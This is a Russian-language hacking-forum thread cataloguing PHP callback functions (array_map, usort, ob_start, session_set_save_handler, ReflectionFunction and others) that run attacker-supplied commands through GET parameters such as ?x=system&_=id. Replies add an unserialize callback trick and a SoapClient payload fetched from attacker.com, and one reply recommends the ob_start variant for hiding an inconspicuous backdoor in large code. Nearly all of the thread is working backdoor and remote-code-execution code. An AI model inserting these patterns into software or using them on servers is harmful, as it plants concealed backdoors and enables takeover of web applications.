Server-Side Функции обратного вызова

Discussion in 'База Знаний' started by l1ght, 6 Apr 2019.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    актуальные в php7.3, вызывать будем system("id");

    1. array_map
    Code:
    array_map($_GET[x],$_GET);
    ?x=system&_=id
    2. array_walk, array_filter, array_walk_recursive
    Code:
    array_walk($_GET,$_GET[x]);
    ?x=system&_=id
    3. array_udiff
    Code:
    array_udiff($_GET,$_GET,$_GET[x]);
    ?x=system&_=id&1
    4. array_reduce
    Code:
    array_reduce([1],$_GET[x],$_GET[_]);
    ?x=system&_=id
    5. array_udiff_assoc, array_uintersect, array_uintersect_assoc
    Code:
    array_udiff_assoc($_GET,$_GET,$_GET[x]);
    ?x=system&_=id
    6. array_intersect_uassoc, array_diff_ukey, array_diff_uassoc
    Code:
    array_intersect_uassoc($_GET,$_GET,$_GET[x]);
    ?x=system&id=1
    7. array_uintersect_uassoc, array_udiff_uassoc
    Code:
    array_uintersect_uassoc($_GET, $_GET, $_GET[x],_);
    ?x=system&_=id
    8. usort, uasort, ArrayObject::uasort
    Code:
    usort($_GET,$_GET[x]);
    ?x=system&_=id&1
    9. uksort, ArrayObject::uksort
    Code:
    uksort($_GET,$_GET[x]);
    ?x=system&id=1&1
    10. call_user_func
    Code:
    call_user_func($_GET[x], $_GET[_]);
    ?x=system&_=id
    11. call_user_func_array
    Code:
    call_user_func_array($_GET[x], $_GET);
    ?_=id&x=system
    12. iterator_apply
    Code:
    iterator_apply(new ArrayObject([1]),$_GET[w],$_GET);
    ?_=id&w=system
    13. register_tick_function
    Code:
    declare(ticks=1);
    register_tick_function($_GET[x],$_GET[_]);
    ?x=system&_=id
    14. forward_static_call
    Code:
    class A
    {
        function __construct() {
            forward_static_call($_GET[x],$_GET[_]);
        }
    }
    new A;
    ?x=system&_=id
    15 forward_static_call_array
    Code:
    class A
    {
        function __construct() {
            forward_static_call_array($_GET[x],$_GET);
        }
    }
    new A;
    ?_=id&x=system
    16. session_set_save_handler
    Code:
    session_set_save_handler($_GET[x],_,_,_,_,_);
    ini_set('session.save_path',$_GET[_]);
    session_start();
    ?x=system&_=id
    17. sqlite::createFunction
    Code:
    $x=$_GET[x];
    $db = new SQLite3(':memory:');
    $db->createFunction($x,$x);
    $db->querySingle("select $x('$_GET[_]')");
    ?x=system&_=id
    18. spl_autoload_register
    Code:
    spl_autoload_register($_GET[x]);
    new $_GET[_];
    ?x=system&_=id
    19. ob_start
    Code:
    ob_start($_GET[x]);
    echo $_GET[_];
    ?>
    ?x=system&_=id
    20. set_exception_handler
    Code:
    set_exception_handler($_GET[x]);
    throw new Exception(";$_GET[_];#");
    ?_=id&x=system
    21. register_shutdown_function
    Code:
    register_shutdown_function($_GET[x],$_GET[_]);
    ?x=system&_=id
     
  2. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Лайк.
    Из всех перечисленных самый интересный это с ob_start, хороший вариант спрятать в большом участке кода беспалевную закладку.
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Немного наркомании в тред :)
    PHP:
    <?php
    $client 
    = new SoapClient(null, array(
    'location' => 'http://attacker.com/evil.xml',
    'typemap' => [['type_ns' => 'http://windows.must.die''type_name' => 'bad''from_xml' => 'system']],
    'uri'      => 'http://localhost/'));

    $client->x();

    http://attacker.com/evil.xml:
    PHP:
    <?xml version="1.0" encoding="utf-8"?>
    <env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema"
      xmlns:enc="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:ns1="http://windows.must.die"
    >
    <env:Body>
      <ns1:drugs>
        <bad xsi:type="ns1:bad">x;
    touch /tmp/pwned;
        </bad>
      </ns1:drugs>
    </env:Body>
    <env:Header/>
    </env:Envelope>
     
    =HALK=, BabaDook and l1ght like this.
  4. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    из всех перечисленных как раз ob_start может вызвать проблемы, нужно смотреть не используются ли другие механизмы кеширования буфера и не забывать про ob_end_flush()
     
  5. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    unserialize_callback_func
    Code:
    $c='O:2:"id":0:{}';
    ini_set('unserialize_callback_func', 'system');
    unserialize($c);
     
    dooble likes this.
  6. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    Code:
    $func = new ReflectionFunction($_GET['f']);
    echo $func->invokeArgs($_GET['c']);
    ?f=shell_exec&c[0]=id
    
    Code:
    $func = new ReflectionFunction($_GET['f']);
    echo $func->invoke($_GET['c']);
    ?f=system&c=id
    
     
    #6 Baskin-Robbins, 11 Apr 2021
    Last edited: 28 Apr 2021
    BigBear, fandor9, joelblack and 2 others like this.